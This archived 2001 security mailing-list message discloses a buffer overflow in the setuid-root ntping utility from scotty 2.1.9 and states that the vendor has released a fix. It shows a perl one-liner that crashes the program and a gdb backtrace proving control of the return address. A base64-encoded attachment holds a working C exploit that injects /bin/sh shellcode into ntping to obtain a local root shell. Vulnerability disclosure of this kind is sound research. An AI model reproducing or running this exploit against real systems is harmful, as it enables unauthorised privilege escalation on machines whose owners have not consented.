Date: Thu, 21 Jun 2001 10:55:48 -0400 (EDT)
From: "Larry W. Cashdollar" <[email protected]>
To: [email protected]Subject: suid scotty (ntping) overflow (fwd)
--0-884179784-993135348=:14183
Content-Type: TEXT/PLAIN; charset=US-ASCII
This has circulated on vuln-dev not sure if it made it here yet. Vendor
has been notified and released a fixed version 2.1.11.
My exploit:
http://vapid.dhs.org/ntping_exp.c
There is a much better exploit out there, but I am not sure if I have
permission to distribute it. So I will leave that to the author.
Credit: KF <[email protected]>
---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <[email protected]>
To: [email protected]Subject: suid scotty (ntping) overflow
I am not sure that this made it on to the list the first time I sent
it... so sorry
if this is a duplicate
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
What led me to research this:
[email protected] (Michael Arndt) wrote:
> i run scotty-testsuite: what must i change on my system:(Linux
> slackware):
> ==== Test generated error:
> can not connect straps socket: Permission denied
straps and ntping must be installed suid root.
^------- Hrmm I sure thought that was interesting to know *grin*
Vendors affected:
unknown by the author of this document
just a note I found however...
<[email protected]>
Hi folks,
here is the long promised posting of all suid/sgid files on a alpha of
SuSE
Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so thats the reason for the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
...
[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x40079b66 in getenv () from /lib/libc.so.6
#1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2 0x4013b9de in __res_ninit () from /lib/libc.so.6
#3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4 0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5 0x080495b8 in _start ()
#6 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
-KF
--0-884179784-993135348=:14183
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ntping_exp.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
Content-Disposition: attachment; filename="ntping_exp.c"
LypMYXJyeSBXLiBDYXNoZG9sbGFyICAgICAgICAgICAgICAgIDYvMTMvMjAw
MQ0KICBodHRwOi8vdmFwaWQuZGhzLm9yZyAgICAgICAgICAgICAgIFZhcGlk
IExhYnMNCiAgT3ZlcmZsb3dzIG50cGluZyBmb3Igc2NvdHR5LTIuMS45IGJh
c2VkIG9uIHBvc3QgYnkNCiAgZG90c2xhc2hAc25vc29mdC5jb20qLw0KDQoj
aW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCg0KI2Rl
ZmluZSBOT1AgMHg5MAkJLypubyBvcGVyYXRpb24gc2tpcCB0byBuZXh0IGlu
c3RydWN0aW9uLiAqLw0KI2RlZmluZSBMRU4gNTkwCQkJLypvdXIgYnVmZmVy
c2l6ZS4gKi8NCg0KLypsYWNrcyBhIGNhbGwgdG8gc2V0dWlkKDApKi8NCmNo
YXIgc2hlbGxjb2RlW109IC8qQWxlcGgxJ3Mgc2hlbGwgY29kZS4gKi8NCiJc
eGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4
ODlceDQ2XHgwY1x4YjBceDBiIg0KIlx4ODlceGYzXHg4ZFx4NGVceDA4XHg4
ZFx4NTZceDBjXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4XHg0MFx4Y2QiDQoi
XHg4MFx4ZThceGRjXHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoNCi8qTmFiIHRo
ZSBzdGFjayBwb2ludGVyIHRvIHVzZSBhcyBhbiBpbmRleCBpbnRvIG91ciBu
b3AncyovDQpsb25nDQpnZXRfc3AgKCkNCnsNCiAgX19hc21fXyAoIm1vdiAl
ZXNwLCAlZWF4Iik7DQp9DQoNCmludA0KbWFpbiAoaW50IGFyZ2MsIGNoYXIg
KmFyZ3ZbXSkNCnsNCiAgY2hhciBidWZmZXJbTEVOXTsNCiAgaW50IGk7DQoN
CiAgbG9uZyByZXRhZGRyID0gZ2V0X3NwICgpOw0KDQovKkZpbGwgdGhlIGJ1
ZmZlciB3aXRoIG91ciBuZXcgYWRkcmVzcyB0byBqdW1wIHRvIGVzcCArIG9m
ZnNldCAqLw0KICBmb3IgKGkgPSAwOyBpIDwgTEVOOyBpICs9IDQpDQogICAg
Kihsb25nICopICZidWZmZXJbaV0gPSByZXRhZGRyICsgYXRvaSAoYXJndlsx
XSk7DQoNCi8qY29weSB0aGUgTk9QcyAgaW4gdG8gdGhlIGJ1ZmZlciBsZWF2
aW5nIHNwYWNlIGZvciBzaGVsbGNvZGUgYW5kDQpwb2ludGVycyovDQoNCiAg
cHJpbnRmICgiSnVtcGluZyB0byBhZGRyZXNzICV4IEJ1ZlNpemUgJWRcbiIs
IHJldGFkZHIgKyBhdG9pIChhcmd2WzFdKSxMRU4pOw0KLyoNCiAgZm9yIChp
ID0gMDsgaSA8IChMRU4gLSBzdHJsZW4gKHNoZWxsY29kZSkgLSAxMDApOyBp
KyspDQogICAgKihidWZmZXIgKyBpKSA9IE5PUDsqLw0KDQovKmNvcHkgdGhl
IHNoZWxsIGNvZGUgaW50byB0aGUgYnVmZmVyKi8NCiAgbWVtY3B5IChidWZm
ZXIgKyBpLCBzaGVsbGNvZGUsIHN0cmxlbiAoc2hlbGxjb2RlKSk7DQoNCiAg
ZXhlY2wgKCIvdXNyL3NiaW4vbnRwaW5nIiwgIm50cGluZyIsIGJ1ZmZlciww
LCAwKTsNCg0KfQ0K
--0-884179784-993135348=:14183--
